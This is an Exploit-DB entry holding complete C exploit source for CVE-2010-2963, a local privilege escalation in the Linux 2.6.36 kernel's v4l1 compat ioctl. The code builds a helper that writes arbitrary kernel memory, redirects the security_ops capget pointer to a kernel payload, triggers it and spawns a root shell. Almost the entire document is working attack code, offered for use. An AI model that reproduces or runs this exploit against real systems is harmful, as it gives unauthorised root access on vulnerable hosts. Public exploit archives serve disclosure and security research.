Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite

EDB-ID:

15344


Author:

Kees Cook

Type:

local


Platform:

Linux

Date:

2010-10-28


// source: https://www.securityfocus.com/bid/44242/info
/*
 * CVE-2010-2963
 * Arbitrary write memory write via v4l1 compat ioctl.
 * Kees Cook <kees@ubuntu.com>
 *
 * greets to drosenberg, spender, taviso
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include "exp_framework.h"

#include <stdint.h>
#include <string.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <linux/videodev.h>
#include <syscall.h>

#include <sys/capability.h>
struct cap_header_t {
    uint32_t version;
    int pid;
};

#define DEVICE "/dev/video0"

struct exploit_state *exp_state;

char *desc = "Vyakarana: Linux v4l1 compat ioctl arbitrary memory write";
int requires_null_page = 0;

int built = 0;

int super_memcpy(unsigned long destination, void *source, int length)
{
    struct video_code vc = { };
    struct video_tuner tuner = { };
    int dev;
    unsigned int code;
    char cmd[80];

    if (!built) {
        FILE *source;
        char *sourcecode = "/*\n\
 * CVE-2010-2963: Write kernel memory via v4l compat ioctl.\n\
 * Oct 11, 2010  Kees Cook <kees@ubuntu.com>\n\
 *\n\
 */\n\
#define _GNU_SOURCE\n\
#include <stdio.h>\n\
#include <stdlib.h>\n\
#include <stdint.h>\n\
#include <unistd.h>\n\
#include <sys/types.h>\n\
#include <sys/stat.h>\n\
#include <fcntl.h>\n\
#include <string.h>\n\
#include <sys/ioctl.h>\n\
#include <sys/mman.h>\n\
#include <assert.h>\n\
#include <malloc.h>\n\
#include <sys/types.h>\n\
#include <linux/videodev.h>\n\
#include <syscall.h>\n\
\n\
#define DEVICE \"/dev/video0\"\n\
\n\
struct video_code32 {\n\
        char            loadwhat[16];\n\
        int             datasize;\n\
        int             padding;\n\
        uint64_t        data;\n\
};\n\
\n\
int super_memcpy(uint64_t destination, void *source, int length)\n\
{\n\
    struct video_code32 vc = { };\n\
    struct video_tuner tuner = { };\n\
    int dev;\n\
    unsigned int code;\n\
\n\
    if ( (dev=open(DEVICE, O_RDWR)) < 0) {\n\
        perror(DEVICE);\n\
        return 1;\n\
    }\n\
\n\
    vc.datasize = length;\n\
    vc.data = (uint64_t)(uintptr_t)source;\n\
\n\
    memset(&tuner, 0xBB, sizeof(tuner));\n\
\n\
    // manual union, since a real union won't do ptrs for 64bit\n\
    uint64_t *ptr = (uint64_t*)(&(tuner.name[20]));\n\
    *ptr = destination;\n\
\n\
    // beat memory into the stack...\n\
    code = VIDIOCSTUNER;\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
\n\
    code = 0x4020761b; // VIDIOCSMICROCODE32 (why isn't this VIDIOCSMICROCODE?)\n\
    syscall(54, dev, code, &vc);\n\
\n\
    return 0;\n\
}\n\
\n\
int main(int argc, char *argv[])\n\
{\n\
    uint64_t destination = strtoull(argv[1], NULL, 16);\n\
    uint64_t value = strtoull(argv[2], NULL, 16);\n\
    int length = atoi(argv[3]);\n\
    if (length > sizeof(value))\n\
        length = sizeof(value);\n\
    return super_memcpy(destination, &value, length);\n\
}\n\
";

        if (!(source = fopen("vyakarana.c","w"))) {
            fprintf(stderr, "cannot write source\n");
            return 1;
        }
        fwrite(sourcecode, strlen(sourcecode), 1, source);
        fclose(source);
        if (system("gcc -Wall -m32 vyakarana.c -o vyakarana") != 0) {
            fprintf(stderr, "cannot build source\n");
            return 1;
        }
        built = 1;
    }

    printf("Writing to %p (len %d): ", (void*)destination, length);
    for (dev=0; dev<length; dev++) {
        printf("0x%02x ", *((unsigned char*)source+dev));
    }
    printf("\n");

    sprintf(cmd, "./vyakarana %lx %lx 8", (uint64_t)(uintptr_t)destination, *(uint64_t*)source);
    return system(cmd);
}

int get_exploit_state_ptr(struct exploit_state *ptr)
{
    exp_state = ptr;
    return 0;
}

unsigned long default_sec;
unsigned long target;
unsigned long restore;

int prepare(unsigned char *buf)
{
    unsigned long addr;

    if (sizeof(long)!=8) {
        printf("Not enough bits\n");
        return 1;
    }

    printf("Reticulating splines...\n");

    addr = exp_state->get_kernel_sym("security_ops");
    default_sec = exp_state->get_kernel_sym("default_security_ops");
    restore = exp_state->get_kernel_sym("cap_capget");

    // reset security_ops
    super_memcpy(addr, &default_sec, sizeof(void*));

    // aim capget to enlightenment payload
    target = default_sec + ((11 + sizeof(void*) -1) / sizeof(void*))*sizeof(void*) + (2 * sizeof(void*));
    super_memcpy(target, &(exp_state->own_the_kernel), sizeof(void*));

    return 0;
}

int trigger(void)
{
    struct cap_header_t hdr;
    uint32_t data[3];

    printf("Skipping school...\n");

    hdr.version = _LINUX_CAPABILITY_VERSION_1;
    hdr.pid = 1;
    capget((cap_user_header_t)&hdr, (cap_user_data_t)data);

    return 1;
}

int post(void)
{
    printf("Restoring grammar...\n");

    // restore security op pointer
    super_memcpy(target, &restore, sizeof(void*));

    return RUN_ROOTSHELL;
}